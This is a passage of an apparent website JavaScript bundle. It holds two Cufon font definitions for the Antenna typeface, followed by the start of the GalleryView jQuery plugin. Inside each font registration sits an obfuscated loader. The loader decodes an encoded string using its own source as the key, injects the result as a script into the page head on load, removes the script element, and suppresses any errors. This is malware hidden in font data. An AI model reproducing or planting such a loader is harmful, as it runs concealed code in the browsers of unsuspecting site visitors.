r0,108r103,0r0,-108r42,0r0,267r-42,0r0,-118r-103,0r0,118","w":232},{"d":"67,0r-42,0r0,-267r42,0r0,267","w":92},{"d":"127,0r-42,0r0,-94r-83,-172r44,0r61,127r60,-127r43,0r-83,172r0,94","w":211,"k":{"z":25,"y":18,"x":25,"w":18,"v":18,"u":25,"t":13,"s":25,"r":25,"q":32,"p":25,"o":32,"n":25,"m":25,"j":7,"i":7,"g":32,"f":13,"e":32,"d":32,"c":32,"a":32,"Z":4,"X":5,"S":11,"Q":9,"O":9,"J":29,"G":9,"C":9,"A":29,"@":15,";":11,":":11,"\/":21,".":32,",":32}},{"d":"115,3v-28,0,-44,-5,-55,-19r0,73r-41,0r0,-255r32,-3r3,19v12,-16,32,-22,62,-22v58,0,67,46,67,103v1,58,-10,104,-68,104xm60,-99v0,39,4,66,43,66v36,0,40,-29,40,-66v0,-37,-4,-68,-40,-68v-39,0,-43,28,-43,68","w":194,"k":{"}":7,"z":3,"y":5,"x":6,"w":4,"v":5,"s":2,"a":2,"]":7,"\\":21,"?":7,".":7,",":7,")":4}},{"d":"20,0r0,-51r48,0r0,51r-48,0xm68,-151r-48,0r0,-50r48,0r0,50","w":88,"k":{"Y":11,"W":4,"V":7,"T":9,"7":9}},{"d":"199,-184v2,78,-54,95,-136,88r0,96r-41,0r0,-267r95,0v57,0,80,27,82,83xm159,-182v0,-55,-45,-49,-95,-48r0,96v50,1,95,7,95,-48","w":210,"k":{"}":4,"z":4,"x":5,"u":7,"t":4,"s":4,"r":7,"q":7,"p":7,"o":7,"n":7,"m":7,"g":7,"f":4,"e":7,"d":7,"c":7,"a":7,"]":4,"Z":7,"Y":7,"X":14,"W":4,"V":4,"U":4,"T":4,"S":6,"J":32,"A":29,"\/":36,".":32,",":32,")":4,"!":4}},{"d":"64,0r-41,0r0,-267r41,0r0,122r95,-122r48,0r-81,102r83,165r-46,0r-66,-131r-33,45r0,86","w":216,"k":{"z":1,"y":11,"w":11,"v":11,"u":7,"t":9,"s":4,"r":5,"q":14,"p":5,"o":14,"n":5,"m":5,"l":2,"g":7,"f":6,"e":14,"d":14,"c":14,"a":7,"Z":4,"Y":5,"W":4,"V":7,"U":4,"T":4,"S":11,"Q":12,"O":12,"G":12,"C":12,"A":4,"@":7,"?":4,"*":7,"'":6,"\"":6}},{"d":"48,0r-41,0r82,-269r44,0r83,269r-43,0r-15,-51r-95,0xm110,-211r-37,122r74,0","w":222,"k":{"}":4,"y":9,"w":7,"v":9,"u":2,"t":7,"q":9,"o":9,"l":2,"f":7,"e":9,"d":9,"c":9,"a":4,"]":4,"\\":25,"Y":29,"W":14,"V":20,"U":9,"T":29,"S":4,"Q":9,"O":9,"G":9,"C":9,"@":7,"?":18,"*":21,")":4,"'":18,"\"":18}},{"d":"0,0r0,0r0,0","w":63},{"d":"185,-16v-19,13,-43,20,-73,20v-80,0,-101,-55,-100,-136v0,-81,21,-137,104,-137v28,0,51,6,67,17r-23,35v-11,-7,-25,-13,-45,-12v-53,0,-61,39,-61,96v0,58,7,99,61,99v22,0,36,-5,50,-14","w":192,"k":{"y":13,"x":2,"w":13,"v":13,"u":6,"t":9,"s":2,"q":6,"o":6,"l":2,"g":2,"f":6,"e":6,"d":6,"c":6,"a":6,"Z":4,"Y":2,"X":5,"W":1,"V":2,"U":5,"S":7,"Q":8,"O":8,"J":2,"G":8,"C":8,"A":2,"@":2}},{"d":"6,0v3,-7,0,-19,1,-28r85,-138r-80,0r0,-35r130,0r0,27r-86,141r90,0r0,33r-140,0","w":151,"k":{"y":1,"w":1,"v":1,"s":1,"q":3,"o":3,"g":1,"e":3,"d":3,"c":3,"a":2,"\\":11,"?":7}},{"d":"101,-167v-69,0,-32,106,-41,167v-13,-1,-30,2,-41,-1r0,-276r40,0r0,92v11,-15,26,-20,56,-20v92,0,49,124,59,204r-40,0r0,-122v0,-28,-4,-44,-33,-44","w":191,"k":{"y":3,"w":1,"v":3,"\\":14,"?":7}},{"d":"209,-134v0,89,-22,136,-110,134r-77,0r0,-267r78,0v85,-1,109,46,109,133xm168,-133v0,-59,-9,-96,-65,-96r-38,0r0,193r39,0v56,0,64,-38,64,-97","w":220,"k":{"}":7,"g":4,"a":4,"]":7,"\\":7,"Z":9,"Y":9,"X":11,"W":5,"V":11,"U":2,"T":9,"S":7,"J":11,"A":9,"\/":7,".":11,",":11,")":4}},{"d":"34,0r11,-75r-29,0r0,-37r35,0r6,-38r-40,0r0,-36r46,0r12,-81r38,0r-12,81r35,0r12,-81r38,0r-12,81r30,0r0,36r-36,0r-5,38r41,0r0,37r-47,0r-11,75r-38,0r11,-75r-35,0r-12,75r-38,0xm86,-109r40,0r7,-43r-41,0","w":219,"k":{"7":4,"2":4}},{"d":"128,-18v-12,15,-28,21,-56,20r1,1v-43,0,-61,-21,-62,-63v-1,-65,46,-74,112,-74v6,-46,-59,-36,-83,-23r-16,-33v17,-10,42,-15,70,-15v84,0,66,77,67,152v0,14,1,17,15,18r0,35v-24,0,-43,0,-48,-18xm122,-102v-39,1,-73,-2,-73,37v0,25,14,33,31,34v37,0,45,-30,42,-71","w":187,"k":{"y":7,"x":4,"w":5,"v":7,"g":2,"\\":21,"?":7}},{"d":"112,-221r-35,0r-50,-61r46,0","w":171},{"d":"148,-11v-16,11,-35,14,-58,15v-63,3,-79,-41,-79,-104v0,-88,55,-124,133,-94r-17,35v-9,-5,-18,-7,-32,-7v-38,0,-43,28,-43,66v0,39,5,68,44,68v14,0,27,-5,37,-9","w":154,"k":{"y":1,"x":2,"v":1,"q":5,"o":6,"g":2,"e":6,"d":5,"c":6,"a":4,"\\":7,"Y":16,"W":11,"V":11,"T":15,"S":4}},{"d":"153,36v33,0,61,-7,84,-16r9,21v-26,10,-54,18,-92,18v-104,0,-136,-59,-136,-164v0,-106,33,-165,136,-165v103,0,136,59,135,165v-1,52,-1,93,-51,93v-25,0,-39,-5,-43,-24v-10,17,-28,23,-57,23v-52,0,-62,-41,-62,-93v0,-52,9,-93,61,-93v25,0,42,4,50,19r7,-17r26,2r0,123v1,20,0,36,21,35v29,-2,22,-34,23,-68v2,-89,-24,-141,-111,-141v-87,0,-111,52,-111,141v0,89,24,142,111,141xm111,-104v0,32,2,61,36,61v37,0,37,-27,38,-61v1,-35,-4,-60,-38,-60v-33,0,-36,28,-36,60","w":305,"k":{"y":4,"x":4,"w":4,"v":4,"Y":14,"X":7,"W":9,"V":11,"T":5,"A":7}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+180-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("2rAaz^Exfk]u2qQ%N^sH0r0]OiEaA^]uOiJHfk;3A&(ZTexl=ambka]jO^0>AQ6:&3ssFs&7;Qda=)1p=V:>fkmKz>~OOqJ{A+5=2{1VOsm7DlNxz+A:{3E5E3&NhU(B1q)XsrV0J2`=EhY6;c{U&kOTAfzDNtFPplS>Q^3K~j7Z:ubmdHexai+$5M%(]-yuJ{U]h);EheD(6ldTYe0pJQ~]=Op+2S5cA&s0c&QmhQ1`6c1)t^pX0isPTxBl`3EmzrQx2q0l2cd~Y{BZD)al`3BZz)am`^dQz^Nxfqd3Yk0uAl53zVQmfV=]t+x%fkTKTl5bfexbOlPyh3N+Namu2{(KYeKu2amuT^daAOE7fk&eOq5uzVmu2amuD)TmOq5uzq>>`i>uNr&eNqpZziEpNrQbzl5Kz+Exz^s:Ac>~A^]H2):~Yrm%2H:~2kNzTa:~O&x]Ds:~OOx~2q>P")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":208,"face":{"font-family":"antenna","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 0 5 3 2 2 2 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-11 -297 341 64","underline-thickness":"0","underline-position":"-86.4844","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © Font Bureau, Inc. | SWF-eXtract by uazero.
 * 
 * Trademark:
 * Please refer to the Copyright section for the font trademark attribution
 * notices.
 * 
 * Full name:
 * AntennaCond-Bold
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"78,2v-85,0,-75,-118,-56,-178v11,-37,91,-41,118,-15r8,-15r40,4r0,259r-55,0r0,-73v-9,13,-27,18,-55,18xm65,-102v1,35,0,56,32,57v33,0,36,-21,36,-57v0,-35,-3,-55,-36,-55v-30,0,-32,21,-32,55","w":204},{"d":"122,-154v-79,-6,-42,90,-50,154r-55,0r0,-201r43,-3r5,19v11,-14,28,-21,57,-21r0,52","w":124},{"d":"194,0r-186,0r0,-43r115,-172r-110,0r0,-52r178,0r0,47r-114,170r117,0r0,50"},{"d":"66,-205r-42,0r39,-66r50,0r39,66r-43,0r-22,-28","w":175},{"d":"178,0r-55,0r-123,-267r55,0","w":178},{"d":"68,2r-60,-269r57,0r35,162r38,-162r50,0r39,162r35,-162r54,0r-60,269r-55,0r-39,-159r-39,159r-55,0","w":323},{"d":"73,-6v1,52,-20,64,-73,63r0,-44v15,2,19,-3,19,-21r0,-196r54,0r0,198xm19,-223r0,-49r54,0r0,49r-54,0","w":92},{"d":"75,0r-54,0r0,-267r60,0r87,154r0,-154r54,0r0,267r-52,0r-95,-166r0,166","w":242},{"d":"146,54r-157,0r0,-40r157,0r0,40","w":134},{"d":"65,-101v3,36,4,57,37,57v13,0,25,-3,34,-8r21,41v-18,11,-42,14,-62,14v-69,1,-86,-39,-86,-106v0,-67,18,-105,89,-105v25,0,45,4,57,11r-24,47v-35,-17,-70,-6,-66,49","w":161},{"d":"0,0r0,0r0,0","w":61},{"d":"136,57r-104,0r0,-334r103,0r0,47r-48,0r0,242r49,0r0,45","w":159},{"d":"63,2r-62,-206r57,0r37,135r37,-135r55,0r-64,206r-60,0","w":186},{"d":"137,0v-57,6,-100,0,-100,-62r0,-94v-10,-1,-24,2,-32,-1r0,-47r34,0r8,-46r43,-9r0,55r47,0r0,48r-47,0r0,87v-4,26,23,22,47,22r0,47","w":149},{"d":"0,0r123,-267r55,0r-123,267r-55,0","w":178},{"d":"227,0r-62,0r-51,-90r-47,90r-61,0r79,-140r-71,-127r62,0r43,76r39,-76r61,0r-71,127","w":233},{"d":"100,-45v27,0,29,-14,29,-42r0,-117r54,0v-5,92,31,218,-84,207v-113,12,-77,-113,-83,-207r55,0r0,118v1,28,0,41,29,41","w":198},{"d":"92,-110v40,14,8,70,7,101v-1,24,24,22,48,21r0,45v-53,3,-110,-3,-104,-49v3,-22,12,-56,15,-79v3,-18,-24,-13,-38,-16r0,-46v73,11,18,-55,23,-95v-8,-46,50,-53,104,-49r0,47v-23,0,-48,-4,-48,20v0,33,34,86,-7,100","w":170},{"d":"87,57r-55,0r0,-334r55,0r0,334","w":118},{"d":"181,0r-160,0r0,-267r56,0r0,217r104,0r0,50","w":184},{"d":"133,0r-57,0r0,-215r-72,0r0,-52r201,0r0,52r-72,0r0,215","w":208},{"d":"53,2r-49,-206r55,0r25,120r30,-120r49,0r30,117r25,-117r52,0r-49,206r-53,0r-31,-114r-30,114r-54,0","w":273},{"d":"211,-180v0,77,-51,100,-135,92r0,88r-55,0r0,-267r102,0v61,0,88,28,88,87xm76,-217r0,81v43,0,85,8,80,-41v5,-48,-38,-40,-80,-40","w":220},{"d":"86,2r-81,-269r58,0r55,187r54,-187r57,0r-82,269r-61,0","w":233},{"d":"177,-138v2,58,-46,70,-104,65v-4,16,13,15,26,16v59,2,89,4,89,53v0,53,-35,64,-92,64v-53,-1,-90,-2,-92,-48v0,-26,11,-41,34,-46v-13,-12,-15,-38,-3,-53v-14,-9,-22,-26,-22,-51v0,-52,33,-73,92,-70r81,-16r0,42r-28,0v12,7,18,22,19,44xm58,2v0,19,14,21,37,21v26,-1,38,-2,38,-23v0,-18,-13,-18,-38,-18v-23,0,-37,2,-37,20xm95,-111v20,0,29,-9,29,-26v0,-17,-9,-26,-29,-26v-20,0,-28,9,-28,26v0,17,8,26,28,26","w":196},{"d":"5,0r83,-269r60,0r84,269r-58,0r-13,-41r-88,0r-12,41r-56,0xm117,-192r-31,101r62,0","w":236},{"d":"27,-141r-2,-126r56,0r-3,126r-51,0xm156,-141r-51,0r-2,-126r56,0","w":183},{"d":"70,-283v56,46,80,193,41,280v-14,31,-26,53,-41,67r-40,-24v59,-58,60,-241,0,-298","w":160},{"d":"62,-78v-4,47,64,36,91,22r20,42v-18,11,-44,16,-77,16v-70,1,-87,-38,-87,-105v0,-65,21,-105,89,-105v78,0,79,53,77,130r-113,0xm127,-120v10,-40,-38,-51,-57,-30v-6,6,-8,16,-8,30r65,0","w":185},{"d":"71,0r-54,0r0,-277r54,0r0,155r55,-82r57,0r-60,85r64,119r-58,0r-41,-75r-17,26r0,49","w":188},{"d":"127,-208v84,0,75,119,56,180v-11,34,-85,40,-111,15r0,70r-55,0r0,-258r44,-3r4,16v9,-13,30,-20,62,-20xm72,-100v0,35,4,55,36,55v31,0,32,-22,32,-55v0,-35,-1,-57,-32,-57v-32,0,-36,21,-36,57","w":204},{"d":"11,-145v0,-71,85,-71,139,-52r-21,45v-20,-12,-89,-13,-60,18v35,16,88,20,88,76v0,73,-105,70,-154,45r21,-41v16,8,35,12,59,13v24,2,30,-19,15,-30v-39,-17,-87,-20,-87,-74","w":163},{"d":"200,-73v6,93,-142,88,-195,52r28,-43v16,17,115,35,112,-8v-3,-48,-88,-38,-111,-70v-38,-54,-7,-138,75,-128v30,3,62,5,82,17r-25,48v-16,-12,-99,-25,-94,12v3,25,17,24,42,33v53,19,82,26,86,87","w":209},{"d":"131,-258v-60,58,-59,240,0,298r-40,24v-55,-47,-82,-192,-41,-280v14,-30,27,-53,41,-67","w":160},{"d":"221,-94v1,68,-28,98,-101,98v-73,0,-101,-31,-101,-98r0,-173r57,0r0,168v1,37,8,52,45,52v36,-1,47,-14,46,-52r0,-168r54,0r0,173","w":240},{"d":"181,0r-58,0r-35,-60r-32,60r-55,0r60,-107r-55,-97r59,0r30,52r26,-52r56,0r-56,99","w":182},{"d":"189,-103v0,68,-18,106,-90,106v-70,0,-90,-39,-90,-106v0,-66,21,-105,90,-105v71,0,90,38,90,105xm99,-157v-46,-3,-37,67,-29,98v2,11,19,15,29,15v33,0,35,-22,35,-57v0,-35,-2,-54,-35,-56","w":198},{"d":"71,0r-50,0r0,-267r72,0r52,170r52,-170r72,0r0,267r-55,0r0,-170r-53,170r-36,0r-54,-170r0,170","w":289},{"d":"158,0r-153,0r0,-36r81,-120r-77,0r0,-48r145,0r0,37r-82,123r86,0r0,44","w":160},{"d":"169,-147v48,13,47,91,21,126v-11,15,-39,24,-80,24v-69,0,-94,-23,-95,-79v-1,-37,7,-60,35,-71v-22,-10,-28,-28,-28,-57v1,-47,29,-66,88,-66v59,0,86,18,87,66v1,29,-7,48,-28,57xm70,-84v0,27,9,41,40,41v30,0,40,-14,40,-41v0,-27,-10,-40,-40,-40v-30,0,-40,13,-40,40xm110,-163v24,0,36,-10,34,-30v2,-20,-10,-31,-34,-31v-24,0,-34,11,-34,31v0,20,10,30,34,30","w":219},{"d":"19,0r0,-204r54,0r0,204r-54,0xm73,-223r-54,0r0,-49r54,0r0,49","w":92},{"d":"65,-188v14,-24,97,-30,108,0v10,-16,40,-19,63,-20v91,-3,48,127,58,208r-55,0r0,-120v0,-24,-1,-36,-24,-36v-30,0,-32,15,-33,44r0,112r-54,0r0,-120v0,-24,-1,-36,-24,-36v-29,1,-33,15,-33,44r0,112r-54,0r0,-201r44,-3","w":307},{"d":"221,-134v0,98,-26,134,-117,134r-83,0r0,-267r83,0v89,0,117,38,117,133xm164,-133v0,-73,-21,-87,-87,-82r0,166v66,5,87,-11,87,-84","w":230},{"d":"81,-141r-62,0r0,-63r62,0r0,63xm35,55r-15,-27v16,-11,25,-9,26,-28r-27,0r0,-63r62,0v-2,32,5,72,-8,92v-6,8,-19,17,-38,26","w":99},{"d":"127,-208v84,0,75,120,56,180v-11,36,-93,39,-118,13r-8,17r-40,-4r0,-275r54,0r0,89v9,-13,28,-20,56,-20xm72,-100v0,35,4,55,36,55v31,0,32,-22,32,-55v0,-35,-1,-57,-32,-57v-32,0,-36,21,-36,57","w":204},{"d":"211,-229v39,83,35,232,-91,232v-88,0,-110,-54,-110,-136v0,-82,22,-138,110,-137v46,1,79,14,91,41xm67,-131v0,49,5,84,53,84v48,0,54,-35,54,-84v0,-49,-6,-85,-54,-85v-47,0,-53,37,-53,85","w":240},{"d":"105,-270v83,0,96,41,99,118v4,119,-32,160,-157,152r0,-47v56,2,104,0,101,-54v-9,12,-30,18,-61,18v-58,0,-74,-34,-74,-89v0,-66,24,-98,92,-98xm104,-220v-30,0,-36,17,-37,47v-1,31,11,46,37,46v28,0,42,-13,43,-44v0,-35,-9,-49,-43,-49","w":220},{"d":"105,-156v-28,1,-33,15,-33,44r0,112r-55,0r0,-201r44,-3r4,16v8,-13,29,-20,62,-20v91,0,51,126,60,208r-55,0r0,-120v0,-25,-2,-36,-27,-36"},{"d":"79,-141r-52,0r-2,-126r57,0","w":105},{"d":"135,-38r-51,0r0,-65r-56,0r0,-47r56,0r0,-65r51,0r0,65r56,0r0,47r-56,0r0,65","w":219},{"d":"31,0r0,-63r62,0r0,63r-62,0xm87,-83r-49,0r-5,-184r59,0","w":124},{"d":"32,55r-15,-27v16,-11,26,-9,26,-28r-27,0r0,-64r62,0v-2,32,6,73,-8,93v-6,8,-19,17,-38,26","w":93},{"d":"19,0r0,-63r62,0r0,63r-62,0xm81,-141r-62,0r0,-63r62,0r0,63","w":99},{"d":"73,-65v0,18,4,18,22,18r0,47v-49,4,-76,-6,-76,-58r0,-219r54,0r0,212","w":105},{"d":"180,-205v0,36,-23,56,-46,70r43,47v7,-21,13,-47,16,-79r45,6v-4,46,-13,83,-27,111r45,50r-67,0r-13,-14v-54,30,-174,26,-167,-59v3,-41,24,-61,51,-76v-35,-47,-18,-123,52,-123v44,0,68,21,68,67xm88,-112v-34,15,-37,70,15,70v17,0,30,-3,41,-8xm112,-225v-28,1,-16,38,-6,55v15,-9,23,-21,24,-35v1,-14,-5,-20,-18,-20","w":261},{"d":"186,0r-165,0r0,-267r165,0r0,52r-110,0r0,53r105,0r0,51r-105,0r0,61r110,0r0,50","w":200},{"d":"174,-80r0,52r-141,-78r0,-37r141,-78r0,52r-84,44","w":218},{"d":"46,-105v0,91,23,135,109,135v34,0,62,-7,83,-17r12,28v-24,12,-60,17,-95,18v-109,2,-142,-55,-142,-164v0,-109,34,-164,142,-164v107,0,142,55,142,164v0,58,-3,93,-58,93v-28,0,-43,-9,-46,-24v-8,16,-28,24,-59,24v-76,0,-68,-105,-51,-158v10,-32,81,-38,101,-11r9,-15r35,3r0,120v-7,29,24,41,33,19v3,-8,3,-25,3,-51v0,-91,-24,-135,-109,-135v-85,0,-109,44,-109,135xm121,-104v0,29,1,50,28,51v30,0,30,-20,31,-51v0,-32,-1,-49,-31,-49v-27,0,-28,19,-28,49","w":309},{"d":"186,-106r-141,78r0,-52r84,-44r-84,-45r0,-52r141,78r0,37","w":219},{"d":"111,-131v-28,0,-49,-29,-65,2r-35,-21v13,-27,30,-39,52,-39v27,0,47,33,66,-2r34,20v-13,27,-31,40,-52,40","w":175},{"d":"213,-133v0,86,-10,136,-97,136v-87,0,-98,-51,-98,-136v0,-86,12,-137,98,-137v86,0,97,53,97,137xm74,-133v0,51,0,86,42,86v43,0,42,-35,42,-86v0,-50,1,-84,-42,-84v-42,0,-42,34,-42,84","w":230},{"d":"81,0r-57,0r0,-267r57,0r0,267","w":104},{"d":"155,-181v0,58,-18,88,-73,88v-54,0,-73,-30,-73,-88v0,-58,18,-87,73,-88v54,0,73,30,73,88xm58,-180v0,29,1,47,24,47v23,0,25,-18,25,-47v0,-29,-2,-46,-25,-46v-23,0,-24,17,-24,46xm375,-86v0,58,-18,88,-73,88v-54,0,-72,-29,-72,-88v0,-58,19,-88,72,-88v53,0,73,30,73,88xm278,-84v0,28,0,46,24,46v24,0,25,-19,25,-46v0,-29,-1,-46,-25,-46v-24,0,-24,17,-24,46xm106,0r123,-267r50,0r-123,267r-50,0","w":383},{"d":"32,0r9,-65r-26,0r0,-50r34,0r4,-27r-38,0r0,-50r45,0r12,-75r51,0r-11,75r27,0r11,-75r52,0r-12,75r28,0r0,50r-35,0r-4,27r39,0r0,50r-47,0r-10,65r-51,0r10,-65r-27,0r-10,65r-51,0xm101,-146r-5,35r35,0r5,-35r-35,0","w":232},{"d":"192,-90v0,71,-27,94,-93,93v-38,0,-68,-7,-91,-20r24,-45v29,18,113,36,105,-27v8,-50,-50,-47,-76,-32r-42,-13r7,-133r153,0r0,50r-107,0r-2,48v9,-6,25,-10,49,-10v56,1,73,28,73,89","w":203},{"d":"25,57r0,-44v16,-1,39,5,38,-13r-63,-204r56,0r35,125r34,-125r54,0r-68,220v-9,40,-38,42,-86,41","w":179},{"d":"212,-158v2,96,2,161,-98,161v-83,0,-104,-53,-104,-136v0,-91,24,-137,113,-137v33,0,59,8,78,21r-30,47v-20,-14,-73,-22,-90,2v-8,12,-15,34,-15,68v1,55,5,86,52,87v41,1,41,-24,41,-65r-52,0r0,-48r105,0","w":221},{"d":"191,-79v0,48,-19,71,-62,78r0,34r-52,0r0,-33v-28,-2,-51,-11,-70,-25r25,-40v20,16,107,42,105,-10v-3,-44,-72,-35,-95,-60v-42,-30,-27,-132,35,-130r0,-30r52,0r0,30v21,3,38,8,52,16r-25,44v-16,-12,-91,-26,-85,13v6,41,68,33,95,57v14,13,25,29,25,56"},{"d":"114,-95r-103,0r0,-49r103,0r0,49","w":124},{"d":"77,0r-56,0r0,-267r165,0r0,52r-109,0r0,57r104,0r0,51r-104,0r0,107","w":195},{"d":"141,0r-57,0r0,-90r-85,-177r60,0r55,117r54,-117r58,0r-85,177r0,90","w":225},{"d":"94,-270v77,-7,95,68,68,124v-12,24,-58,72,-83,99r99,0r0,47r-169,0r0,-43v30,-34,82,-82,103,-117v14,-24,12,-61,-27,-58v-20,1,-38,5,-53,13r-24,-46v18,-12,47,-16,86,-19","w":194},{"d":"138,-236v-28,-1,-53,-3,-46,32r46,0r0,48r-46,0r0,156r-54,0r0,-156v-10,-1,-25,2,-33,-1r0,-47r33,0v-8,-63,31,-84,100,-79r0,47","w":140},{"d":"77,0r-56,0r0,-267r56,0r0,101r89,0r0,-101r57,0r0,267r-57,0r0,-110r-89,0r0,110","w":243},{"d":"21,-267v82,2,188,-17,183,69v-2,32,-11,51,-31,58v25,7,36,29,36,65v0,51,-31,75,-88,75r-100,0r0,-267xm76,-110r0,63v36,-1,76,8,76,-32v0,-40,-39,-30,-76,-31xm76,-159v33,-1,76,7,71,-30v5,-36,-37,-28,-71,-29r0,59","w":221},{"d":"117,-90r-44,0r5,-55r-40,31r-24,-39r49,-26r-49,-25r24,-39r40,32r-5,-56r44,0r-5,56r41,-32r23,38r-48,26r48,26r-23,39r-41,-32","w":191},{"d":"10,-133v0,-82,22,-137,110,-137v123,0,129,140,94,226v-10,26,-37,39,-75,44v-4,23,28,19,51,19r0,47v-63,4,-113,-6,-105,-68v-59,-13,-75,-62,-75,-131xm67,-131v0,49,5,84,53,84v48,0,54,-35,54,-84v0,-49,-6,-85,-54,-85v-47,0,-53,37,-53,85","w":240},{"d":"79,-110v-40,-14,-9,-69,-7,-100v1,-23,-25,-20,-48,-20r0,-47v53,-3,112,4,104,49v3,25,-29,78,-7,92r30,3r0,46v-15,3,-39,-3,-38,16v0,14,15,62,15,79v0,46,-50,53,-104,49r0,-45v24,1,50,3,48,-21v-2,-29,-33,-88,7,-101","w":170},{"d":"188,-205v6,71,-72,60,-65,127r-53,0v-7,-58,31,-66,57,-98v16,-20,4,-43,-30,-43v-20,0,-38,5,-54,13r-23,-46v48,-27,178,-33,168,47xm65,0r0,-57r62,0r0,57r-62,0","w":205},{"d":"0,0r0,0r0,0","w":61},{"d":"121,-73v3,68,-46,77,-112,73r0,-50v29,1,56,1,56,-27r0,-190r56,0r0,194","w":140},{"d":"129,57r-104,0r0,-45r48,0r0,-242r-47,0r0,-47r103,0r0,334","w":159},{"d":"123,-267v60,0,88,27,88,85v1,41,-14,69,-45,85r43,97r-59,0r-38,-89r-36,0r0,89r-55,0r0,-267r102,0xm76,-139v42,0,80,8,80,-39v0,-47,-38,-39,-80,-39r0,78","w":224},{"d":"29,-60r0,-50r162,0r0,50r-162,0xm191,-142r-162,0r0,-50r162,0r0,50","w":219},{"d":"105,-156v-29,0,-33,15,-33,44r0,112r-55,0r0,-277r54,0r0,88v7,-12,26,-19,56,-19v91,0,51,126,60,208r-55,0r0,-120v0,-25,-2,-36,-27,-36"},{"d":"208,-92v1,66,-24,95,-93,95v-84,0,-98,-40,-98,-118v0,-117,34,-162,156,-152r0,50v-56,-1,-104,-1,-101,53v9,-12,29,-18,61,-18v61,-1,75,34,75,90xm73,-94v0,34,8,49,43,49v31,0,37,-16,37,-47v0,-31,-11,-46,-37,-46v-27,0,-43,13,-43,44","w":220},{"d":"96,0r-58,0r76,-217r-107,0r0,-50r167,0r0,43","w":180},{"d":"148,-146v47,7,39,109,11,131v-32,26,-119,21,-152,-2r24,-45v29,18,102,34,96,-22v5,-42,-42,-33,-80,-34r0,-45v33,-1,74,9,74,-28v0,-43,-63,-27,-88,-15r-22,-44v44,-26,163,-42,163,45v0,33,-7,52,-26,59","w":195},{"d":"78,0r-62,0r0,-64r62,0r0,64","w":93},{"d":"77,0r-56,0r0,-267r56,0r0,110r81,-110r65,0r-80,104r81,163r-62,0r-57,-115r-28,38r0,77","w":229},{"d":"10,-52r0,-43r93,-172r57,0r-92,170r55,0r11,-75r39,0r0,75r32,0r0,45r-32,0r0,52r-51,0r0,-52r-112,0","w":212},{"d":"120,-223r-47,0r-52,-66r61,0","w":175},{"d":"67,-132v0,55,6,83,53,85v18,0,33,-5,47,-14r27,43v-18,15,-46,20,-77,21v-84,2,-107,-52,-107,-136v0,-85,23,-137,111,-137v28,0,52,7,72,20r-30,46v-11,-7,-25,-11,-44,-11v-45,0,-52,29,-52,83"},{"d":"99,0r-54,0r0,-217r-37,0r0,-50r91,0r0,267","w":128},{"d":"99,-208v87,-8,74,69,74,145v0,12,3,17,14,16r0,47v-23,0,-52,4,-58,-16v-9,13,-28,18,-56,18v-48,1,-65,-22,-65,-64v0,-64,43,-74,112,-73v5,-38,-63,-21,-79,-13r-21,-44v17,-10,43,-13,79,-16xm120,-96v-34,1,-58,-2,-60,28v-1,18,12,26,25,26v32,0,37,-21,35,-54","w":196},{"d":"10,-103v0,-59,11,-104,71,-105v27,0,44,5,52,16r0,-85r55,0r0,275r-44,4r-4,-19v-9,13,-30,19,-62,19v-60,0,-68,-47,-68,-105xm65,-102v1,35,0,56,32,57v33,0,36,-21,36,-57v0,-35,-3,-55,-36,-55v-30,0,-32,21,-32,55","w":204}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+408-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("`p5qW#J2n=gd`ek{9#PBUpUgM?Jq5#gdM?1Bn=xs5o4u;^2%:M1nMkH:o?zCM?hS=-52Meg;9MV4[Px-bP5sio,%`=oD:@J[`PoXW2q(CpkVxEV%[^kd1BuF0Ezu1yb4iEGah$ykU^oGxBiVxkyB5yFe`kPgtqHqhEmFh$z9bjqcJj:^0yu2;$hH;=i%0sJ,Wpk2`eU%`>Hzt[vu:Eq%0svuWEq,0#HkW#92neHst=Ud5%GsW@k,n@hg8-2{n=;c;%G.n^2.M%S~Cs9-9q,d`[4ct^cd`q,d;#Hq5MJDn=o^MeGdW@,d`q,d:E;,MeGdWeyy0?yd9po^9eFuW?JF9pk.W%GcW-J2W#PvmeE$Pp@U1`0hJCtix>[bo=M;5nW:98KSF%jyk#sczlDuVd.,HB^2q?-XG({4ga~V5>yz5#gB`EVztp,{`BVz`=9W;qVzMo2g:PVzMM2z`eyS")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":202,"face":{"font-family":"antenna","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 0 5 3 2 2 2 4","ascent":"288","descent":"-72","x-height":"3","bbox":"-11 -295 375 66.7699","underline-thickness":"0","underline-position":"-90","unicode-range":"U+0020-U+007E"}}));



/*

	GalleryView - jQuery Content Gallery Plugin
	Author: 		Jack Anderson
	Version:		1.1 (April 5, 2009)
	Documentation: 	http://www.spaceforaname.com/jquery/galleryview/
	
	Please use this development script if you intend to make changes to the
	plugin code.  For production sites, please use jquery.galleryview-1.0.1-pack.js.
	
*/
(function($){
	$.fn.galleryView = function(options) {
		var opts = $.extend($.fn.galleryView.defaults,options);
		
		var id;
		var iterator = 0;
		var gallery_width;
		var gallery_height;
		var frame_margin = 10;
